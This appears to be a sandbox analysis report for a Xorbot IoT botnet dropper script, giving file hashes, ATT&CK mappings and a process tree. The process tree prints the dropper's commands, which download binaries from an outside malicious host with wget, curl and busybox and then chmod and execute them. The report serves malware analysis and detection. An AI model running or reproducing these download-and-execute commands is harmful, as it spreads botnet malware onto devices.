xorbot | 9a1fe6336b9891af1c5f6e09f6de24ac6aaf11c273b36380e10a8b41ca8bc349

Analysis

max time kernel
149s
max time network
9s
platform
debian-9_mips
resource
debian9-mipsbe-20240418-en
resource tags

arch:mipsimage:debian9-mipsbe-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
10/12/2024, 10:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bins.sh
Size

10KB
MD5

2cb62c12f7b74b008f2d2fe409ccfe5d
SHA1

06bdad09642ff840259f813a0fd9fc348a58b76d
SHA256

9a1fe6336b9891af1c5f6e09f6de24ac6aaf11c273b36380e10a8b41ca8bc349
SHA512

b11226d6f0d4244e5e88379ed0e86a4dcadfeae59d3d59be80eb52e4f503e4167a497c1f063993bc932876323aa05770dcb52fc561896b47c7e599297f145277
SSDEEP

96:YDUdDUdDUAU7UHUQO+P99Eo1VELttJLr7rXroXB5jFDfipBrLFlqUyKSLBGB2BfA:PfhyU6t8ckH

Score

10^/10

xorbot botnet defense_evasion discovery trojan

Malware Config

Signatures

Detects Xorbot 1 IoCs

botnet trojan

resource	yara_rule
behavioral3/files/fstream-1.dat	family_xorbot

Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
botnet trojan xorbot
Xorbot family
xorbot

File and Directory Permissions Modification 1 TTPs 1 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
742	chmod

Executes dropped EXE 1 IoCs

ioc	pid	Process
/tmp/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q	743	Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q

Reads runtime system information 2 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 5 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
746	wget
747	curl
718	wget
739	curl
741	busybox

Writes file to tmp directory 4 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/SRqwwztMb4ZN2ietZ14ud58aWDFM93L5KR	wget
File opened for modification	/tmp/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q	wget
File opened for modification	/tmp/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q	curl
File opened for modification	/tmp/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q	busybox

/tmp/bins.sh
/tmp/bins.sh
1⤵
PID:710
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:714
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:718
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:739
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:741
- /bin/chmod
  chmod 777 Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
  2⤵
  - File and Directory Permissions Modification
  PID:742
- /tmp/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
  ./Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
  2⤵
  - Executes dropped EXE
  PID:743
- /bin/rm
  rm Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q
  2⤵
  PID:745
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/SRqwwztMb4ZN2ietZ14ud58aWDFM93L5KR
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:746
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/SRqwwztMb4ZN2ietZ14ud58aWDFM93L5KR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  PID:747

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Cp43IruSDxr1bWfflurg56uAZjiJIxyb7q

Filesize
112KB

MD5
05d7857dcead18bbd86d2935f591873c

SHA1
34d18f41ef35f93d5364ce3e24d74730a4e91985

SHA256
2cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70

SHA512
d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e

Download Submit
/tmp/SRqwwztMb4ZN2ietZ14ud58aWDFM93L5KR

Filesize
151KB

MD5
3c90d5820bddcf7c5d1bd21dfa49d958

SHA1
5ba05bd489e50af97d6dc45e3a0be60e494d5083

SHA256
bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2

SHA512
54a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a

Download Submit